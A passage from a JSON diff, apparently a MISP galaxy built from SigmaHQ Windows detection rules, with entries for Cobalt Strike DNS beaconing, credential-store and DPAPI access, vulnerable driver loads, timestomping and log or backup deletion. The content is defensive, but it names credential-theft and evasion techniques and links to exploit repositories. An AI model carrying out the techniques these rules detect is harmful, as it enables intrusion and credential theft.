"Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "value": "Suspicious Cobalt Strike DNS Beaconing", + "meta": { + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2021/11/09", + "filename": "dns_query_win_mal_cobaltstrike.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "value": "DNS Query for MEGA.io Upload Domain", + "meta": { + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2021/05/26", + "filename": "dns_query_win_mega_nz.yml", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "level": "high", + "falsepositive": [ + "Legitimate Mega upload" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).", + "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", + "value": "Possible DNS Rebinding", + "meta": { + "refs": [ + "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189" + ], + "creation_date": "2019/10/25", + "filename": "dns_query_win_possible_dns_rebinding.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", + "value": "Regsvr32 Network Activity - DNS", + "meta": { + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/10/25", + "filename": "dns_query_win_regsvr32_network_activity.yml", + "author": "Dmitriy Lifanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", + "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "value": "Suspicious DNS Query for IP Lookup Service APIs", + "meta": { + "refs": [ + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://twitter.com/neonprimetime/status/1436376497980428318", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1590" + ], + "creation_date": "2021/07/08", + "filename": "dns_query_win_susp_ipify.yml", + "author": "Brandon George (blog post), Thomas Patzke (rule)", + "level": "medium", + "falsepositive": [ + "Legitimate usage of ip lookup services such as ipify API" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious LDAP request from non-Windows application", + "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "value": "Suspicious LDAP Domain Access", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ], + "creation_date": "2022/08/20", + "filename": "dns_query_win_susp_ldap.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Programs that also lookup the observed domain" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", + "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", + "value": "Suspicious TeamViewer Domain Access", + "meta": { + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/01/30", + "filename": "dns_query_win_susp_teamviewer.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "value": "Query Tor Onion Address", + "meta": { + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ], + "creation_date": "2022/02/20", + "filename": "dns_query_win_tor_onion.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects DNS queries for subdomains used for upload to ufile.io", + "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "value": "DNS Query for Ufile.io Upload Domain", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2022/06/23", + "filename": "dns_query_win_ufile_io.yml", + "author": "yatinwad and TheDFIRReport", + "level": "high", + "falsepositive": [ + "Legitimate Ufile upload" + ], + "logsource.category": "dns_query", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "value": "Credential Dumping Tools Service Execution", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ], + "creation_date": "2017/03/05", + "filename": "driver_load_mal_creddumper.yml", + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "critical", + "falsepositive": [ + "Highly unlikely" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell script installed as a Service", + "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "value": "PowerShell Scripts Run by a Services", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "driver_load_powershell_script_installed_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "value": "Process Hacker and System Informer Driver Load", + "meta": { + "refs": [ + "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ], + "creation_date": "2022/11/16", + "filename": "driver_load_process_hacker.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate user of process hacker or system informer by low level developers or system administrators" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects a driver load from a temporary directory", + "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "value": "Suspicious Driver Load from Temp", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2017/02/12", + "filename": "driver_load_susp_temp_use.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", + "value": "Vulnerable AVAST Anti Rootkit Driver Load", + "meta": { + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/28", + "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "value": "Vulnerable Dell BIOS Update Driver Load", + "meta": { + "refs": [ + "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ], + "creation_date": "2021/05/05", + "filename": "driver_load_vuln_dell_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of known vulnerable drivers by hash value", + "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "value": "Vulnerable Driver Load", + "meta": { + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://github.com/tandasat/ExploitCapcom", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/08/18", + "filename": "driver_load_vuln_drivers.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of known vulnerable drivers via their names only.", + "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "value": "Vulnerable Driver Load By Name", + "meta": { + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/10/03", + "filename": "driver_load_vuln_drivers_names.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "uuid": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "value": "Vulnerable GIGABYTE Driver Load", + "meta": { + "refs": [ + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/25", + "filename": "driver_load_vuln_gigabyte_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "uuid": "295c9289-acee-4503-a571-8eacaef36b28", + "value": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "meta": { + "refs": [ + "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/08/18", + "filename": "driver_load_vuln_hevd_driver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "value": "Vulnerable HW Driver Load", + "meta": { + "refs": [ + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/26", + "filename": "driver_load_vuln_hw_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "value": "Vulnerable Lenovo Driver Load", + "meta": { + "refs": [ + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ], + "creation_date": "2022/11/10", + "filename": "driver_load_vuln_lenovo_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate driver loads (old driver that didn't receive an update)" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "value": "Vulnerable WinRing0 Driver Load", + "meta": { + "refs": [ + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/26", + "filename": "driver_load_vuln_winring0_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", + "value": "WinDivert Driver Load", + "meta": { + "refs": [ + "https://reqrypt.org/windivert-doc.html", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" + ], + "tags": [ + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" + ], + "creation_date": "2021/07/30", + "filename": "driver_load_windivert.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate WinDivert driver usage" + ], + "logsource.category": "driver_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Browser Credential Store Access", + "meta": { + "refs": [ + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ], + "creation_date": "2022/04/09", + "filename": "file_access_win_browser_credential_stealing.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Software installed on other partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access", + "meta": { + "refs": [ + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ], + "creation_date": "2022/10/11", + "filename": "file_access_win_credential_manager_stealing.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", + "value": "Suspicious Access To Windows DPAPI Master Keys", + "meta": { + "refs": [ + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/10/17", + "filename": "file_access_win_dpapi_master_key_access.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "value": "Suspicious Access To Windows Credential History File", + "meta": { + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/10/17", + "filename": "file_access_win_susp_cred_hist_access.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_access", + "logsource.product": "windows" + } + }, + { + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "value": "File Creation Date Changed to Another Year", + "meta": { + "refs": [ + "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + ], + "tags": [ + "attack.t1070.006", + "attack.defense_evasion" + ], + "creation_date": "2022/08/12", + "filename": "file_change_win_2022_timestomping.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Changes made to or by the local NTP service" + ], + "logsource.category": "file_change", + "logsource.product": "windows" + } + }, + { + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "value": "Unusual File Modification by dns.exe", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2022/09/27", + "filename": "file_change_win_unusual_modification_by_dns_exe.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_change", + "logsource.product": "windows" + } + }, + { + "description": "Detect DLL deletions from Spooler Service driver folder", + "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "value": "Windows Spooler Service Suspicious File Deletion", + "meta": { + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ], + "creation_date": "2021/07/01", + "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Deletion of log files is a known anti-forensic technique", + "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", + "value": "Delete Log from Application", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2022/01/16", + "filename": "file_delete_win_delete_appli_log.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "value": "Deletes Backup Files", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/01/02", + "filename": "file_delete_win_delete_backup_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitime usage" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of a prefetch file (AntiForensic)", + "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "value": "Prefetch File Deletion", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2021/09/29", + "filename": "file_delete_win_delete_prefetch.yml", + "author": "Cedric MAURUGEON", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "value": "Exchange PowerShell Cmdlet History Deleted", + "meta": { + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/10/26", + "filename": "file_delete_win_exchange_powershell_logs.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Possible FP during log rotation" + ], + "logsource.category": "file_delete", + "logsource.product": "windows" + } + }, + { 